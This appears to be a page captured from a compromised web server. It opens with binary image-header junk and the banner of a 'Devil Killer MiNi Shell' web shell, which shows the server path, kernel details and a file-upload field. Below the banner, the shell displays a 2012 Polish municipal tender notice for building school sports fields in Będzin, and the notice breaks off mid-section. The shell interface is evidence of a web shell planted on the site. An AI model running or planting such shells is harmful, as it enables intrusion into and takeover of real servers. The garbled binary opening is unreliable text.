JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120402/75155-N-2012.html

<p class="kh_header"><b>Będzin: Budowa boisk sportowych przy Szkole Podstawowej nr 1</b><br>
<b>Numer ogłoszenia: 75155 - 2012; data zamieszczenia: 02.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Będzin reprezentowane przez Prezydenta Miasta Będzina , ul. 11 Listopada 20, 42-500 Będzin, woj. śląskie, tel. 32 267 91 34, faks 32 267 91 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bedzin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa boisk sportowych przy Szkole Podstawowej nr 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Geodezyjne wytyczenie obiektów sportowych na gruncie przez uprawnionego geodetę.
2.Rozebranie nawierzchni asfaltowych istniejących boisk wraz z ich obramowaniem
(z obrzeży betonowych) i podbudowy. 
3.Demontaż istniejących urządzeń stanowiących wyposażenie boisk oraz ławek.
4.Budowa drenażu odwadniającego do kanalizacji miejskiej w ul. Szkolnej. 
5. Budowa oświetlenia boisk.
6.Budowa:
-boiska do piłki ręcznej/nożnej 22,0 m x 44,0 m,
-boiska do piłki siatkowej, koszykówki 15,0 m x 28,0 m,
o nawierzchni z trawy syntetycznej zielonej o wysokości całkowitej 22mm z zasypaniem piaskiem kwarcowym.
7.Budowa placu zabaw 15m x 14,5m o nawierzchni z trawy syntetycznej zielonej 
o wysokości całkowitej 22mm z zasypaniem piaskiem kwarcowym.
8.Budowa bieżni do skoku w dal o nawierzchni z trawy syntetycznej zielonej o wysokości całkowitej 22mm z zasypaniem piaskiem kwarcowym.
9.Przekładka gazociągu pod nadzorem Górnośląskiej Spółki Gazownictwa - Rozdzielni Gazu w Będzinie. 
10.Zakup i montaż elementów wyposażenia boisk 
11.Budowa piłkochwytów.
12.Wymiana istniejącego ogrodzenia na metalowe 3D o wys. 5,0m.
13.Budowa chodników.
14.Niwelacja i uporządkowanie terenu w obrębie przebudowywanych boisk i chodników wraz z dowozem niezbędnej ilości ziemi urodzajnej, z wykonaniem nasadzeń, urządzeniem trawników oraz zakupem i zabudowaniem elementów małej architektury - ławki parkowe, kosze na odpadki.
15.Wycinka żywopłotu oraz wykonanie nowych nasadzeń.
16.Wykonanie powykonawczego operatu geodezyjnego z uzyskaniem potwierdzenia 
o naniesieniu zrealizowanych obiektów w zasobach geodezyjnych powiatu.
Szczegółowy zakres robót określony jest poprzez dokumentację projektową załącznik nr 8 do SIWZ, specyfikacje techniczne załącznik nr 9 do SIWZ i przedmiary robót załącznik 
nr 6  do SIWZ.
Zamówienie będzie zrealizowane wg szczegółowego zakresu określonego w projekcie, specyfikacjach technicznych i przedmiarach robót.
Przedmiar robót należy traktować jako element pomocniczy przy ustalaniu ceny ofertowej. Wykonawca musi uwzględnić w cenie oferty wszystkie prace nieujęte w przedmiarze robót,
a które są niezbędne do wykonania przedmiotu umowy. Niezależnie od opisanych powyżej robót Wykonawca zobowiązuje się do wykonania wszystkich innych prac, które nie zostały szczegółowo wymienione w treści umowy i dokumentacji, jeżeli ich konieczność Wykonawca  powinien był lub mógł przewidzieć przed złożeniem oferty, po zapoznaniu się 
z dokumentacją techniczną Zamawiającego, a także na podstawie posiadanego przez siebie doświadczenia zawodowego. 
UWAGA:
1. Zaleca się, aby Wykonawca dokonał wizji lokalnej oraz pozyskał wszelkie informacje, które mogą być konieczne do przygotowania oferty oraz podpisania umowy.
2.Wymaga się prowadzenia robót przy przekładce sieci gazociągu pod nadzorem Górnośląskiej Spółki Gazownictwa - Rozdzielni Gazu w Będzinie zgodnie z wydanymi warunkami.
3. Wszystkie nawierzchnie muszą posiadać jeden z dokumentów: aprobatę lub rekomendację
ITB, kartę techniczną, atest PZH, deklarację zgodności z PN EN 14877:2008. Dokumentów tych nie należy składać wraz z ofertą. Wymóg ich dostarczenia będzie obowiązkiem Wykonawcy na etapie realizacji zadania. Wszystkie materiały budowlane w realizacji przedsięwzięcia muszą posiadać certyfikaty i atesty bezpieczeństwa wystawione przez producentów i być zgodne parametrami technicznymi z dokumentacją techniczną 
Ponadto:
W pozycjach, w których opis przedmiotu zamówienia zawiera nazwę Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń pod warunkiem zapewnienia parametrów nie gorszych niż określone w dokumentacji. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały 
i urządzenia. Wykazanie równoważności zaoferowanego przedmiotu spoczywa 
na Wykonawcy. Złożone wyżej wskazane dokumenty będą podlegały ocenie przez autora dokumentacji projektowej, który sporządzi stosowną opinię. 
Przy wykonywaniu robót należy stosować wyroby dopuszczone do obrotu i stosowania 
w budownictwie zgodnie z ustawą z dnia 07 lipca 1994r. - Prawo budowlane ( Dz. U. z 2010r. Nr 243, poz. 1623 z późniejszymi zmianami). 
Wykonawca wykona roboty budowlane zgodnie z Rozporządzeniem Ministra Infrastruktury 
z dnia 23 czerwca 2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003r. Nr 120, poz. 1126) w tym względzie kierownik budowy opracuje plan BIOZ.
Utrzymanie czystości i porządku oraz gospodarkę odpadami należy prowadzić zgodnie 
z ustawą z dnia 13 września1996 r. o utrzymaniu czystości i porządku w gminach (tj. z 2005r. Dz. U. Nr 236, poz.2008 ze zm.) oraz ustawą z dnia 14 września 2010 r. o odpadach 
(tj. z 2010 Dz. U. Nr 185, poz. 1243 ze zm.); przy czym koszt powyższego zawarty jest w cenie za wykonanie robót.
Wykonawca musi mieć uregulowany stan formalno-prawny w zakresie wytwarzania odpadów. Zamawiający wymaga od wykonawcy przedstawienia kart ewidencji odpadów oraz kart przekazania odpadów powstałych podczas realizacji inwestycji. Wywóz i utylizacja materiałów z rozbiórki zgodnie z ustawą o odpadach; przy czym koszt powyższego zawarty jest w cenie za wykonanie robót.
Wykonawca przyjmując do wykonania w/w roboty obowiązany jest wykonać je ze szczególną starannością i dbałością o interesy Zamawiającego, zgodnie z obowiązującymi normami
i przepisami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.21.22.00-8, 45.23.30.00-9, 45.34.20.00-6, 45.11.27.10-5, 45.33.00.00-9, 45.26.23.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępując do udziału w postępowaniu  obowiązany jest wnieść wadium w PLN  stosownie  do art.45  i  następne  ustawy  Prawo  zamówień  publicznych    ( tj. Dz. U. z 2010r. Nr 113 poz. 759 ze zm. )  w  wysokości:   20 000,00zł ( słownie: dwadzieścia  tysięcy  złotych 00/100).    
2.Wykonawca wnoszący wadium w formie pieniężnej winien przelać je na konto: ING Bank Śląski S.A O/Będzin nr 44 1050 1142 1000 0023 0074 0087 z dopiskiem Wadium na zadanie: Budowa boisk sportowych przy Szkole Podstawowej nr 1.

3.W przypadku wniesienia wadium w  formach niepieniężnych, oryginał wadium należy złożyć w Urzędzie  Miejskim w Będzinie Biuro Zamówień Publicznych pok.117 ul. 11 Listopada 20, 42-500 Będzin.
4.Wadium może być wnoszone w jednej lub kilku następujących formach:
a)pieniądzu, UWAGA! Za termin  wniesienia wadium w tej formie uważa się termin wpływu środków pieniężnych na konto Zamawiającego.
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)   gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. Zm.).
5.Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku  bankowym.
6. Wadium wnosi się przed upływem terminu składania ofert.
7. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a. ustawy Pzp.
8.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
9.Zamawiajacy zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10. Zamawiający żąda ponownego wniesienia wadium przez  wykonawcę, któremu zwrócono
wadium na podstawie pkt 7  niniejszej części SIWZ , jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium 
w terminie określonym przez Zamawiającego.
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi 
na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp , nie złożył dokumentów 
lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, chyba 
że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
12.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono  przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
13.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
c)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza żadnych szczegółów, ocena spełniania odbędzie się na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się wykazania robót budowlanych wykonanych w zakresie niezbędnym 
do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Warunek zostanie spełniony, jeżeli Wykonawca wykaże:
-dwie roboty o minimalnej wartości  brutto 700 000,00 zł każda.  Za roboty budowlane odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia  uznaje się roboty w zakresie budowy boisk w technologii trawy syntetycznej z wypełnieniem włókien dywanu piaskiem kwarcowym.


Jeżeli kwoty w dokumentach określone są w walucie innej niż w złotych polskich, Zamawiający dokona ich przeliczenia na polskie złote według Tabeli kursów średnich walut obcych ogłoszonego przez Narodowy Bank Polski w dniu wszczęcia postępowania. Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa powyżej polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp to w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia). Dokumenty potwierdzające spełnianie warunków mogą być przedstawione w formie oryginałów lub czytelnych kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę. Wykonawcy wspólnie tworzący jeden podmiot mogą złożyć dokumenty potwierdzające spełnienie warunków udziału w postępowaniu (wystarczającym będzie, jeżeli dokumenty te złoży tylko jeden z Wykonawców wspólnie składających ofertę, o ile potwierdzać to będzie spełnianie warunków udziału w postępowaniu ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza żadnych szczegółów, ocena spełniania odbędzie się na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się wykazania osób, które będą uczestniczyć w wykonywaniu zamówienia, 
w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz 
z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.

Warunek dysponowania zostanie spełniony jeżeli Wykonawca wykaże:

Dysponowanie minimum 1 osobą:
-posiadającą niezbędne uprawnienia do pełnienia samodzielnych funkcji technicznych 
w budownictwie do kierowania robotami budowlanymi w specjalności: 
- konstrukcyjno - budowlanej,
- instalacyjnej w zakresie sieci, wodociągowych i   kanalizacyjnych,
- instalacyjnej w zakresie sieci, instalacji gazowych,
- instalacyjnej w zakresie sieci elektroenergetycznych,
lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane 
na podstawie wcześniej obowiązujących przepisów.


Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa powyżej polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp to w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia). Dokumenty potwierdzające spełnianie warunków mogą być przedstawione w formie oryginałów lub czytelnych kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę. Wykonawcy wspólnie tworzący jeden podmiot mogą złożyć dokumenty potwierdzające spełnienie warunków udziału w postępowaniu (wystarczającym będzie, jeżeli dokumenty te złoży tylko jeden z Wykonawców wspólnie składających ofertę, o ile potwierdzać to będzie spełnianie warunków udziału w postępowaniu ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-Zamawiający wymaga, aby  Wykonawca wykazał, iż posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 500 000,00 zł,
-Zamawiający wymaga, aby Wykonawca wykazał, iż posiada opłaconą polisę, 
a w przypadku jej braku inny dokument  potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia  o wartości  co najmniej 500 000,00 zł. 


Jeżeli kwoty w dokumentach określone są w walucie innej niż w złotych polskich, Zamawiający dokona ich przeliczenia na polskie złote według Tabeli kursów średnich walut obcych ogłoszonego przez Narodowy Bank Polski w dniu wszczęcia postępowania.Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa powyżej polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp to w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia). Dokumenty potwierdzające spełnianie warunków mogą być przedstawione w formie oryginałów lub czytelnych kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę. Wykonawcy wspólnie tworzący jeden podmiot mogą złożyć dokumenty potwierdzające spełnienie warunków udziału w postępowaniu (wystarczającym będzie, jeżeli dokumenty te złoży tylko jeden z Wykonawców wspólnie składających ofertę, o ile potwierdzać to będzie spełnianie warunków udziału w postępowaniu ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony czytelnie, podpisany przez Wykonawcę formularz ofertowy na druku
lub według druku stanowiącym załącznik nr 1 do SIWZ. 
UWAGA ! Na formularzu ofertowym należy ujawnić wszystkie podmioty składające ofertę wspólną z zaznaczeniem np. konsorcjum. 
2.Pełnomocnictwo w sytuacjach, w których uprawnienie do podpisania oferty nie wynika
z zapisu we właściwym rejestrze lub ewidencji, w tym wynikające z art. 23 ust. 2 ustawy Pzp.
3.Tabela rozliczeniowa podpisana przez Wykonawcę sporządzona na druku lub według druku załącznik nr 10 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W przypadkach niżej przewidzianych dopuszcza się wprowadzenie zmian umowy za zgodą Zamawiającego.
2.Zmiany te  mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
